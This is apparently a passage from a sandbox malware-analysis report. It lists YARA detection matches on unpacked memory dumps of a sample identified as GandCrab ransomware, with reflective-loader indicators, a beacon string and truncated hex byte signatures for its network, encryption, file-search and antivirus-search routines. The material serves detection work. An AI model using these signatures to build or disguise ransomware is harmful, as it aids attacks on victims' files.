00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
33.3.wzltxa.exe.2f00000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
33.3.wzltxa.exe.2f00000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
33.3.wzltxa.exe.2f00000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
33.3.wzltxa.exe.2f00000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
33.3.wzltxa.exe.2f00000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
33.3.wzltxa.exe.2f00000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
25.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
25.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
25.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
25.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
34.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
34.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
34.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
34.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
34.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
34.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
13.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
13.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
13.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
13.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
13.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
13.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
13.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
39.3.wzltxa.exe.4010000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
39.3.wzltxa.exe.4010000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
39.3.wzltxa.exe.4010000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
39.3.wzltxa.exe.4010000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
39.3.wzltxa.exe.4010000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
39.3.wzltxa.exe.4010000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
22.3.wzltxa.exe.3640000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
22.3.wzltxa.exe.3640000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
22.3.wzltxa.exe.3640000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
22.3.wzltxa.exe.3640000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
22.3.wzltxa.exe.3640000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
22.3.wzltxa.exe.3640000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
18.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
18.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
18.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
18.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
18.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
18.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
28.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
28.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
28.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
28.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
28.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
28.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
15.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
15.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
15.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
15.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
15.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
15.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
15.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
18.3.wzltxa.exe.3a80000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
18.3.wzltxa.exe.3a80000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
18.3.wzltxa.exe.3a80000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
18.3.wzltxa.exe.3a80000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
18.3.wzltxa.exe.3a80000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
18.3.wzltxa.exe.3a80000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
31.3.wzltxa.exe.3b90000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
31.3.wzltxa.exe.3b90000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
31.3.wzltxa.exe.3b90000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
31.3.wzltxa.exe.3b90000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
31.3.wzltxa.exe.3b90000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
31.3.wzltxa.exe.3b90000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 